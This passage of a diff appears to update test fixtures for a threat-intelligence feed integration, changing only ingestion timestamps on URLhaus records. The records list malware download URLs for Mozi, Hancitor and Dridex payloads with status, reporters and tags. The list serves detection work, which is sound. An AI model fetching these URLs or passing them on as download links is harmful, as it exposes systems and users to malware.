listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15877,7 +15877,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026847300Z", + "ingested": "2021-12-14T14:56:15.726534699Z", "original": "{\"id\":\"961219\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961219/\",\"url\":\"http://allanabolicsteam.net/nedfr_.exe\",\"url_status\":\"offline\",\"host\":\"allanabolicsteam.net\",\"date_added\":\"2021-01-14 18:47:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"Myrtus0x0\",\"larted\":\"true\",\"tags\":[\"c2\",\"hancitor\",\"payload\"]}", "category": "threat", "type": "indicator", @@ -15923,7 +15923,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026854400Z", + "ingested": "2021-12-14T14:56:15.726535063Z", "original": "{\"id\":\"961217\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961217/\",\"url\":\"https://intranetstc.micromart.com.br/fined.php\",\"url_status\":\"offline\",\"host\":\"intranetstc.micromart.com.br\",\"date_added\":\"2021-01-14 18:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"0x49736b\",\"larted\":\"false\",\"tags\":[\"Dridex\"]}", "category": "threat", "type": "indicator", @@ -15971,7 +15971,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026861300Z", + "ingested": "2021-12-14T14:56:15.726535537Z", "original": "{\"id\":\"961218\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961218/\",\"url\":\"http://allanabolicsteam.net/1301s.bin\",\"url_status\":\"online\",\"host\":\"allanabolicsteam.net\",\"date_added\":\"2021-01-14 18:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"Myrtus0x0\",\"larted\":\"true\",\"tags\":[\"c2\",\"hancitor\",\"payload\"]}", "category": "threat", "type": "indicator", @@ -16020,7 +16020,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026868200Z", + "ingested": "2021-12-14T14:56:15.726535958Z", "original": "{\"id\":\"961216\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961216/\",\"url\":\"http://89.160.20.156:43741/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:44:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -16070,7 +16070,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026875200Z", + "ingested": "2021-12-14T14:56:15.726536323Z", "original": "{\"id\":\"961215\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961215/\",\"url\":\"http://89.160.20.156:45803/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:41:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"false\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -16119,7 +16119,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026882200Z", + "ingested": "2021-12-14T14:56:15.726536689Z", "original": "{\"id\":\"961214\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961214/\",\"url\":\"http://89.160.20.156:38611/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16168,7 +16168,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026889200Z", + "ingested": "2021-12-14T14:56:15.726537533Z", "original": "{\"id\":\"961213\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961213/\",\"url\":\"http://89.160.20.156:35185/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16217,7 +16217,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026896100Z", + "ingested": "2021-12-14T14:56:15.726537900Z", "original": "{\"id\":\"961212\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961212/\",\"url\":\"http://89.160.20.156:35054/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16266,7 +16266,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026903Z", + "ingested": "2021-12-14T14:56:15.726538268Z", "original": "{\"id\":\"961207\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961207/\",\"url\":\"http://89.160.20.156:60038/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16315,7 +16315,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026910Z", + "ingested": "2021-12-14T14:56:15.726538623Z", "original": "{\"id\":\"961208\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961208/\",\"url\":\"http://89.160.20.156:52253/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16364,7 +16364,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026916900Z", + "ingested": "2021-12-14T14:56:15.726539088Z", "original": "{\"id\":\"961209\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961209/\",\"url\":\"http://89.160.20.156:43125/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16413,7 +16413,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026923900Z", + "ingested": "2021-12-14T14:56:15.726539508Z", "original": "{\"id\":\"961210\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961210/\",\"url\":\"http://89.160.20.156:52650/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16462,7 +16462,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026930800Z", + "ingested": "2021-12-14T14:56:15.726539874Z", "original": "{\"id\":\"961211\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961211/\",\"url\":\"http://89.160.20.156:59273/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16511,7 +16511,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026937700Z", + "ingested": "2021-12-14T14:56:15.726540251Z", "original": "{\"id\":\"961206\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961206/\",\"url\":\"http://89.160.20.156:40346/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16560,7 +16560,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026944700Z", + "ingested": "2021-12-14T14:56:15.726540617Z", "original": "{\"id\":\"961204\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961204/\",\"url\":\"http://89.160.20.156:44242/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16609,7 +16609,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026951700Z", + "ingested": "2021-12-14T14:56:15.726541063Z", "original": "{\"id\":\"961205\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961205/\",\"url\":\"http://89.160.20.156:40624/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16658,7 +16658,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026958500Z", + "ingested": "2021-12-14T14:56:15.726541422Z", "original": "{\"id\":\"961202\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961202/\",\"url\":\"http://89.160.20.156:41245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16707,7 +16707,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026965500Z", + "ingested": "2021-12-14T14:56:15.726541788Z", "original": "{\"id\":\"961203\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961203/\",\"url\":\"http://89.160.20.156:48866/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16756,7 +16756,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026972400Z", + "ingested": "2021-12-14T14:56:15.726542152Z", "original": "{\"id\":\"961198\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961198/\",\"url\":\"http://89.160.20.156:58258/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16805,7 +16805,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026979400Z", + "ingested": "2021-12-14T14:56:15.726542519Z", "original": "{\"id\":\"961199\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961199/\",\"url\":\"http://89.160.20.156:34516/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16854,7 +16854,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026986300Z", + "ingested": "2021-12-14T14:56:15.726543257Z", "original": "{\"id\":\"961200\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961200/\",\"url\":\"http://89.160.20.156:47851/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16903,7 +16903,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026993200Z", + "ingested": "2021-12-14T14:56:15.726543616Z", "original": "{\"id\":\"961201\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961201/\",\"url\":\"http://89.160.20.156:49226/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16953,7 +16953,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027000300Z", + "ingested": "2021-12-14T14:56:15.726543987Z", "original": "{\"id\":\"961197\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961197/\",\"url\":\"http://89.160.20.156:36957/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -17002,7 +17002,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027007200Z", + "ingested": "2021-12-14T14:56:15.726544351Z", "original": "{\"id\":\"961196\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961196/\",\"url\":\"http://89.160.20.156:53089/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17051,7 +17051,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027014100Z", + "ingested": "2021-12-14T14:56:15.726544728Z", "original": "{\"id\":\"961193\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961193/\",\"url\":\"http://89.160.20.156:57114/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17100,7 +17100,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027021200Z", + "ingested": "2021-12-14T14:56:15.726545437Z", "original": "{\"id\":\"961194\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961194/\",\"url\":\"http://89.160.20.156:33163/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17149,7 +17149,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027028100Z", + "ingested": "2021-12-14T14:56:15.726545804Z", "original": "{\"id\":\"961195\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961195/\",\"url\":\"http://89.160.20.156:48557/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17199,7 +17199,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027069900Z", + "ingested": "2021-12-14T14:56:15.726546176Z", "original": "{\"id\":\"961192\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961192/\",\"url\":\"http://89.160.20.156:59976/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:31:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -17248,7 +17248,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027077900Z", + "ingested": "2021-12-14T14:56:15.726546550Z", "original": "{\"id\":\"961191\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961191/\",\"url\":\"http://89.160.20.156:48291/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -17297,7 +17297,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027085Z", + "ingested": "2021-12-14T14:56:15.726547006Z", "original": "{\"id\":\"961190\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961190/\",\"url\":\"http://89.160.20.156:45797/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17347,7 +17347,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027092Z", + "ingested": "2021-12-14T14:56:15.726547375Z", "original": "{\"id\":\"961186\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961186/\",\"url\":\"http://89.160.20.156:43741/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -17396,7 +17396,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027099Z", + "ingested": "2021-12-14T14:56:15.726547746Z", "original": "{\"id\":\"961187\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961187/\",\"url\":\"http://89.160.20.156:35446/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17445,7 +17445,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027105800Z", + "ingested": "2021-12-14T14:56:15.726548112Z", "original": "{\"id\":\"961188\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961188/\",\"url\":\"http://89.160.20.156:35720/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17494,7 +17494,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027112700Z", + "ingested": "2021-12-14T14:56:15.726548549Z", "original": "{\"id\":\"961189\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961189/\",\"url\":\"http://89.160.20.156:50501/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17543,7 +17543,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027119500Z", + "ingested": "2021-12-14T14:56:15.726549073Z", "original": "{\"id\":\"961185\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961185/\",\"url\":\"http://89.160.20.156:55796/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17592,7 +17592,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027126500Z", + "ingested": "2021-12-14T14:56:15.726549443Z", "original": "{\"id\":\"961183\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961183/\",\"url\":\"http://89.160.20.156:52308/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17641,7 +17641,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027133400Z", + "ingested": "2021-12-14T14:56:15.726549809Z", "original": "{\"id\":\"961184\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961184/\",\"url\":\"http://89.160.20.156:59154/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17690,7 +17690,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027140400Z", + "ingested": "2021-12-14T14:56:15.726550177Z", "original": "{\"id\":\"961177\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961177/\",\"url\":\"http://89.160.20.156:57950/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17739,7 +17739,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027147900Z", + "ingested": "2021-12-14T14:56:15.726551159Z", "original": "{\"id\":\"961178\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961178/\",\"url\":\"http://89.160.20.156:33520/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17788,7 +17788,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027155100Z", + "ingested": "2021-12-14T14:56:15.726551586Z", "original": "{\"id\":\"961179\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961179/\",\"url\":\"http://89.160.20.156:45525/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17837,7 +17837,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027162Z", + "ingested": "2021-12-14T14:56:15.726552105Z", "original": "{\"id\":\"961180\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961180/\",\"url\":\"http://89.160.20.156:38430/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17886,7 +17886,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027168900Z", + "ingested": "2021-12-14T14:56:15.726552469Z", "original": "{\"id\":\"961181\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961181/\",\"url\":\"http://89.160.20.156:4096/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17935,7 +17935,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027175900Z", + "ingested": "2021-12-14T14:56:15.726552965Z", "original": "{\"id\":\"961182\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961182/\",\"url\":\"http://89.160.20.156:50631/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17984,7 +17984,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027182900Z", + "ingested": "2021-12-14T14:56:15.726553337Z", "original": "{\"id\":\"961176\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961176/\",\"url\":\"http://89.160.20.156:37989/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 